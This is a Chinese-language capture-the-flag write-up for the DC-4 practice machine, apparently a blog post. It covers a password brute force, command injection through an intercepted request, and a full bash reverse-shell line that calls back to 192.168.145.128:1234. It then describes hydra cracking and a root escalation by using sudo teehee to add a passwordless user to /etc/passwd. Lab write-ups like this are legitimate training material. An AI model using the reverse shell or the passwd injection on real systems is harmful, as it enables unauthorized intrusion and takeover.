dc4打靶报告

先arp-scan -l 扫局域网内存活主机

发现疑似靶机ip,开始探测

start attrack攻击最后得到密码happy

command进去,发现不同的选项run了之后,select后面会对应一些命令行,所以可以推测run了之后终端会执行对应的命令行

所以run的时候抓包看一下,找到了命令行的地方

send to repeater试一下其他命令

whoami回显成功

kali连反弹shell

把bash命令行写到这里面,然后放包

注意:前面观察ls的时候,数据包里面传输的命令行把空格都换成了加号+

所以我们的bash命令是这样的

复制代码
bash+-c+'bash+-i+>&+/dev/tcp/192.168.145.128/1234+0>&1'

修改之后forward放包

连接成功

到处看看有什么有用的

几个名字下都是空,jim用户里有东西,继续进到backups里面还有一个old-passwords.bak文件

cat后发现是一个密码列表

重新开一个攻击终端,把密码列表copy过去

hydra爆破

爆破出来jim的密码是jibril04

远程连接成功,看到回显里面有个提示

"You have mail"

猜测是不是让找mail文件,ls看一下

果然有一封来着另一个用户charles的mail

给了密码,直接su到charles用户下,切换成功

我们看一下这个账号能用root权限做什么

这里,说明用户 charles 可以无需密码,以 root 权限执行 /usr/bin/teehee 命令

开始提权------passwd文件注入提权

用这个命令添加一个免密的root666用户

检查,写入成功了

切换过去,成功了

找到flag文件

成功!

完结撒花!!!

相关推荐
宵时待雨几秒前
linux笔记归纳5:进程控制
linux·运维·笔记
The Shio15 分钟前
OptiByte 操练场:面向 IoT/嵌入式的协议可视化调试工具
网络·嵌入式硬件·物联网·c#·.net·业界资讯·iot
志栋智能30 分钟前
超自动化巡检:实现精细化运维管理的基础
运维·服务器·网络·人工智能·自动化
TOSUN同星31 分钟前
同星多工位自动化刷写台架,助力汽车电子高效量产与质量追溯
运维·自动化·汽车
夏日听雨眠41 分钟前
LInux(gcc处理器,库文件,动静态库)
linux·运维·服务器
xingfujie1 小时前
Ubuntu K8s 1.28 kubeadm 高可用集群部署实战
linux·运维·服务器·docker·kubernetes
Tutankaaa1 小时前
从单场到多场并发:知识竞赛平台的弹性扩展能力
服务器·笔记·学习·职场和发展
实心儿儿1 小时前
Linux —— 进程间通信 - 命名管道
linux·运维·服务器
Felven1 小时前
盛科CTC8096端口速率40G切换10G配置
网络·40g·盛科·ctc8096·10g
Agent手记1 小时前
多渠道订单数据处理自动化,落地步骤与ERP打通方案 | 2026企业级智能体实战手册
运维·人工智能·ai·自动化